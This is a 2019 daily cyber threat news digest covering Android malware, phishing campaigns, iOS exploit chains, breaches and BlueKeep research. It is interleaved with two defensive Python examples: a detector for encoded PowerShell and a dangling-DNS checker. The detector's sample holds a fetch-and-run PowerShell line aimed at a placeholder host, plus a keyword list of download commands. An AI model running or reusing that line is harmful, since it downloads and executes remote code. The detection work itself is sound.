
Silobreaker Daily Cyber Digest – 30 August 2019

 

Malware

New Android RAT used to spy on targets in Brazil

  • Researchers at Kaspersky identified a new Android remote access tool (RAT), dubbed BRATA, that exclusively targets users in Brazil. To run correctly, the malware requires Android Lollipop 5.0 or later.
  • The malware has been widespread since January 2019 and over 20 variants have appeared on the Google Play Store. The majority of these variants purport to be security updates from WhatsApp. Infection vectors included push notifications on compromised websites, SMS or WhatsApp messages, and sponsored links in Google searches.
  • When BRATA is installed on a victim’s device it can run keylogging functions which are enhanced with real-streaming functionality. The malware can also be used to interact with apps on the user’s device by using Android’s Accessibility Service feature.

Source (Includes IOCs)

 

Ongoing Campaigns

New multistage phishing campaign discovered stealing PayPal credentials

  • Trend Micro researchers discovered a new phishing campaign, dubbed Heatstroke, that uses multiple stages to steal PayPal credentials. The stages are: a phishing email sent from a legitimate domain, so that it avoids spam filters and appears more legitimate; a first-stage website that evades content filters; the phishing kit website, which checks the victim’s IP address against a range of blocked addresses; and the actual phishing site, which is localized to match the victim’s IP address.
  • Once a victim enters their credentials, they are sent to the attacker via regular email and in some cases using steganography. The researchers found the complete code for steganography to be missing, suggesting that this function is still in development.
  • A phishing kit with similar tactics and techniques was also found to be targeting Amazon users, suggesting they have the same origin. The attackers also appear to have adopted a phishing-as-a-service business model and code in the kit suggests the attackers plan on running similar kits for eBay, Google, Apple, Firefox, and more.

Source (Includes IOCs)

 

Researcher publishes analysis of watering hole attack abusing iPhone zero-day

  • Google’s Project Zero researcher Ian Beer published his analysis of a watering hole attack discovered by Google’s Threat Analysis Group in February 2019. The attack involved multiple hacked websites, targeting iPhone users running iOS 10 through to iOS 12 with five separate iPhone exploit chains.
  • The exploits targeted fourteen vulnerabilities: seven in Safari, five in the kernel, and two separate sandbox escapes. One of the exploit chains was a zero-day, abusing CVE-2019-7287 and CVE-2019-7286, which Apple fixed shortly after discovery.
  • The attack was said to be indiscriminate, with anyone visiting the hacked websites being attacked by the exploit server, which then installed a monitoring implant. The implant focused on stealing files and uploading live location data and had access to database files used by end-to-end encryption apps such as WhatsApp, Telegram and iMessage.
  • A full technical analysis of each exploit chain and the implant is available on Project Zero’s blog.

Source

 

New campaign embeds Trickbot in Google Docs link to bypass Proofpoint’s gateway

  • Researchers at Cofense discovered a new phishing campaign that managed to bypass Proofpoint’s gateway by embedding Trickbot in a Google Docs link.
  • The attackers send emails pretending to be a legitimate message from Google Docs that is usually sent when a file has been shared. However, the victim is instead redirected to a fake 404 site containing another embedded link, where they are asked to manually download the file via the link. Once clicked, it downloads the malicious payload that is disguised as a PDF.

Source (Includes IOCs)

 

Ad clicker apps downloaded over 1.5 million times by Google Play users

  • Researchers at Symantec identified two apps on the Google Play Store that contain a stealthy ad-clicking function. Published by Idea Master, the notepad app and the fitness app had been collectively downloaded approximately 1.5 million times. The apps were present on the Google Play Store for nearly a year, remaining undetected because they used a legitimate Android packer.
  • The attack begins with a notification in the user’s notification drawer. When the notification is clicked, a Toast displays a hidden view containing advertisements. The attackers also draw adverts on a Canvas outside the device’s viewable display, so users cannot see the adverts or the malicious content running on their device.
  • Devices that are infected will quickly become low on battery, run with degraded performance, and use mobile data.

Source (Includes IOCs)

 

Fake Smart Game Booster site contains Baldr infostealer trojan

  • Researchers at Malware Hunter Team discovered a malicious site that appears identical to the Smart Game Booster site. The malicious site purports to provide performance enhancing software for gaming. Users who download software from the fake site will infect their devices with a variant of Baldr Infostealer.
  • The malware can exfiltrate saved login credentials, browser profiles, cryptocurrency wallets, text documents, FTP programs, and more. The trojan does not feature persistence capabilities and runs only once on the target device before removing itself.

Source (Includes IOCs)

 

Hacker Groups

FIN6 threat group attacks multinational organizations for financial gain

  • Researchers at IBM X-Force identified attacks directed against multinational organizations by the financially motivated threat actor FIN6. The group, which has been operational since 2015, has previously targeted POS machines, e-commerce checkout pages, and the hospitality sector in the US and Europe.
  • The researchers stated that this recent campaign employs spear phishing emails to initiate an infection process that results in the delivery of More_eggs malware. The JavaScript backdoor is sold on the dark web and is used to establish persistence in a compromised network. The attackers also use base64-encoded PowerShell commands, Comodo code signing certificates, and more.

Source (Includes IOCs)
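The base64-encoded PowerShell mentioned in the FIN6 item is something a defender can look for directly in process-creation telemetry. The following is an added example, not code from the digest or from IBM X-Force: it scans one-line process-creation events (Windows 4688 or Sysmon event 1 style, with a `cmdline="..."` field, an assumed layout), recognises the `-EncodedCommand` flag in its abbreviated forms, decodes the UTF-16LE base64 payload, and surfaces keywords worth an analyst's attention. The sample events, the keyword list and the `example.invalid` URL are all constructed for the demonstration.

```python
"""Flag base64-encoded PowerShell command lines in process-creation logs.

Added example for the digest's FIN6 item; it is not code from the digest
or from IBM X-Force.  It assumes one log line per process-creation event
(Windows 4688 or Sysmon event 1 style) with a cmdline="..." field, and
the sample events below are constructed for the demonstration.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass, field
from typing import Iterable, Optional

# powershell.exe accepts -EncodedCommand as any unambiguous prefix (-e, -en,
# -enc, ...) plus the documented short form -ec; capture the flag and the
# base64 blob that follows it.
ENC_FLAG = re.compile(r"(?:^|\s)[-/](e[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Substrings whose presence in the decoded script or the rest of the command
# line is worth surfacing to an analyst (illustrative, not exhaustive).
SUSPICIOUS = ("invoke-expression", "iex", "downloadstring", "downloadfile",
              "net.webclient", "frombase64string", "-nop", "hidden")


@dataclass
class Alert:
    line_no: int
    decoded: Optional[str]          # None when the blob did not decode
    indicators: list[str] = field(default_factory=list)


def is_encoded_command_flag(flag: str) -> bool:
    flag = flag.lower()
    return flag == "ec" or "encodedcommand".startswith(flag)


def decode_encoded_command(blob: str) -> Optional[str]:
    """-EncodedCommand carries base64 of the script encoded as UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_events(lines: Iterable[str]) -> list[Alert]:
    alerts: list[Alert] = []
    for line_no, line in enumerate(lines, 1):
        if "powershell" not in line.lower():
            continue
        m = ENC_FLAG.search(line)
        if not m or not is_encoded_command_flag(m.group(1)):
            continue
        decoded = decode_encoded_command(m.group(2))
        if decoded is None:
            alerts.append(Alert(line_no, None,
                                ["payload did not decode as base64/UTF-16LE"]))
            continue
        # Search the decoded script plus the command line with the blob cut
        # out, so random base64 characters cannot produce false keyword hits.
        context = line[:m.start(2)] + line[m.end(2):]
        haystack = decoded.lower() + " " + context.lower()
        alerts.append(Alert(line_no, decoded,
                            [k for k in SUSPICIOUS if k in haystack]))
    return alerts


def _encode_ps(script: str) -> str:
    """Build a blob the way PowerShell expects it (used only for the sample)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample events; example.invalid is a reserved, non-routable name.
SAMPLE_SCRIPT = ("Invoke-Expression (New-Object Net.WebClient)"
                 ".DownloadString('http://example.invalid/stage')")
SAMPLE_EVENTS = [
    '2019-08-30T09:12:01Z host=WS01 user=jdoe cmdline="C:\\Windows\\explorer.exe"',
    '2019-08-30T09:12:07Z host=WS01 user=jdoe cmdline="powershell.exe '
    '-ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"',
    '2019-08-30T09:13:44Z host=WS01 user=jdoe cmdline="powershell.exe '
    '-NoP -W Hidden -enc ' + _encode_ps(SAMPLE_SCRIPT) + '"',
    '2019-08-30T09:14:02Z host=WS02 user=svc cmdline="powershell.exe '
    '-ec QUJDREVGR0hJSktMTQ=="',   # valid base64, but not UTF-16LE text
]

if __name__ == "__main__":
    for a in scan_events(SAMPLE_EVENTS):
        print(f"line {a.line_no}: {a.indicators}")
        if a.decoded:
            print("  decoded:", a.decoded)
```

Of the four constructed events, only the third and fourth produce alerts: the plain `-File` invocation on line two is legitimate administration and is left alone, while a blob that is base64 but not UTF-16LE text is still reported, since that is itself unusual for a genuine `-EncodedCommand`. Keyword hits are matched against the decoded script and the rest of the command line with the blob removed, which keeps base64 noise from triggering the keyword list.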

 

Members of cybercrime group TipTop arrested

  • Russian authorities, in coordination with Group-IB, tracked down and arrested members of the TipTop Group. The group has been active since 2015 and is believed to have infected over 800,000 Android smartphones.
  • The group rented Android banking trojans which they distributed through third-party app stores and search engine adverts. TipTop primarily employed Hqwar malware which can read SMS messages, record calls and display fake login screens on top of legitimate banking apps.
  • The criminals primarily targeted the customers of Russian banks. Group-IB researchers estimated that the operators were earning between $1,500 and $10,500 daily.

Source

 

Leaks and Breaches

Russian surveillance devices found to be leaking data

  • Security researcher Leonid Evdokimov discovered 30 SORM devices running on unsecured FTP servers, exposing traffic logs from past law enforcement surveillance operations. SORM is hardware equipment used by Russian authorities enabling them to connect to devices, set up filtering and logging rules, and retrieve logged data.
  • Exposed data included GPS coordinates for residents of Sarov, ICQ instant messenger usernames, IMEI numbers, telephone numbers, router MAC addresses and GPS coordinates from individuals in Novosilske, and GPS coordinates from smartphones with outdated firmware.
  • The leak was first discovered in April 2018 and all devices were secured by August 26th, 2019. It remains unclear what caused the leak.

Source

 

PerCSoft dental record storage and backup provider infected with ransomware

  • Digital Dental Record’s cloud management provider PerCSoft was hit with a ransomware attack on August 26th, 2019. The company operates an online data backup service, DDS Safe, that is used by dental practices to archive medical records, insurance documents, charts, and more. The attack encrypted DDS Safe, impacting files of approximately 400 dental practices.
  • Several sources are reporting that the ransomware is a recent and advanced variant of Sodinokibi malware. Purported screenshots of conversations between an affected dental office and PerCSoft also appear to show that PerCSoft or their insurer has paid the ransom.
  • Affected dental offices have been provided with a decryptor and 80 to 100 clients have restored their files. However, some practices are reporting that the key is not working.

Source

 

Starbucks exposes subdomain through abandoned Azure site

  • On August 1st, 2019, security researcher Parzel discovered a Starbucks subdomain containing a DNS pointer to an abandoned Azure cloud host. By claiming the Azure resource name, an attacker could have used the Starbucks subdomain to perform cross-site scripting and session hijacking attacks. Parzel disclosed the vulnerability to Starbucks, which resolved the issue.

Source
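The Starbucks item is a dangling-DNS case: a CNAME in the organisation's zone still points at a cloud hostname whose backing resource was deleted, so the name can be re-registered by anyone. The check below is an added example, not code from the digest, from Starbucks or from the researcher: it walks a zone export given as `(owner, type, rdata)` triples, keeps CNAMEs whose target sits under a provider suffix where names are claimable, and reports those the resolver answers with NXDOMAIN. The suffix list, the sample zone and the in-memory resolver are constructed for the demonstration; for a real run the resolver would be backed by a DNS client.

```python
"""Find dangling CNAMEs that point at claimable cloud hostnames.

Added example for the digest's Starbucks item; it is not code from the
digest, from Starbucks or from the researcher.  It assumes a zone export
as (owner, type, rdata) triples and a resolver callable; the provider
suffix list, the sample zone and the sample resolver are constructed.
"""
from __future__ import annotations

from dataclasses import dataclass
from typing import Callable, Iterable, Optional

# Hostnames under these suffixes are handed out first-come, so a deleted
# resource can be re-registered by anyone (illustrative list; assumed to be
# kept current against the providers' own documentation).
CLAIMABLE_SUFFIXES = (
    ".azurewebsites.net",
    ".cloudapp.azure.com",
    ".cloudapp.net",
    ".trafficmanager.net",
    ".blob.core.windows.net",
)

# A resolver answers with a list of addresses, or None for NXDOMAIN.
Resolver = Callable[[str], Optional[list[str]]]


@dataclass(frozen=True)
class Finding:
    owner: str     # record in our zone, e.g. "old-promo.example.com"
    target: str    # where its CNAME points
    reason: str


def normalise(name: str) -> str:
    return name.rstrip(".").lower()


def is_claimable_target(target: str) -> bool:
    t = normalise(target)
    return any(t.endswith(suffix) for suffix in CLAIMABLE_SUFFIXES)


def find_dangling_cnames(records: Iterable[tuple[str, str, str]],
                         resolve: Resolver) -> list[Finding]:
    findings: list[Finding] = []
    for owner, rtype, rdata in records:
        # Only CNAMEs into claimable namespaces are interesting here.
        if rtype.upper() != "CNAME" or not is_claimable_target(rdata):
            continue
        if resolve(normalise(rdata)) is None:
            findings.append(Finding(
                normalise(owner), normalise(rdata),
                "CNAME target is NXDOMAIN on a claimable cloud suffix"))
    return findings


# Constructed sample zone and the answers a resolver would give for it.
SAMPLE_ZONE = [
    ("www.example.com.", "A", "203.0.113.10"),
    ("app.example.com.", "CNAME", "example-prod.azurewebsites.net."),
    ("old-promo.example.com.", "CNAME", "promo-2017.cloudapp.net."),
    ("docs.example.com.", "CNAME", "docs.vendor-cdn.example."),
    ("example.com.", "MX", "10 mail.example.com."),
]
SAMPLE_ANSWERS = {"example-prod.azurewebsites.net": ["203.0.113.20"]}


def sample_resolver(name: str) -> Optional[list[str]]:
    """Offline stand-in for a DNS lookup over the constructed answers."""
    return SAMPLE_ANSWERS.get(normalise(name))


def check_sample() -> list[Finding]:
    return find_dangling_cnames(SAMPLE_ZONE, sample_resolver)


if __name__ == "__main__":
    for f in check_sample():
        print(f"{f.owner} -> {f.target}: {f.reason}")
```

Against the constructed zone only `old-promo.example.com` is reported: its target is under a claimable suffix and no longer resolves. Two caveats apply in practice. A target that does resolve is not proof of safety, because someone else may already have claimed it, so the resolved result should be compared with the organisation's own cloud inventory; and the suffix list has to be maintained, since providers change which namespaces are claimable.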

 

TGI Fridays Australia exposes data of loyalty program customers

  • On August 29th, 2019, TGI Fridays Australia confirmed that a publicly exposed database contained data relating to the MyFridays membership reward program. The company declined to comment on the nature of the data or how long it was exposed for. An email was sent to customers, ‘strongly recommending’ that they change their membership reward program password.

Source

 

Vulnerabilities

Researchers publish analysis of BlueKeep exploitation

  • Researchers at Palo Alto Networks Unit 42 analysed the remote code execution vulnerability CVE-2019-0708, commonly known as BlueKeep, to understand how Remote Desktop Services (RDS) in Windows could be exploited. The wormable flaw was patched in May 2019 and users are encouraged to patch their systems.
  • The research focuses on three ways of writing data into the kernel with RDP PDUs, namely the Bitmap Cache PDU, the Refresh Rect PDU and the RDPDR Client Name Request PDU. The researchers believe other ways of facilitating exploitation exist but have not yet been documented.

Source


The Silobreaker Team Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.
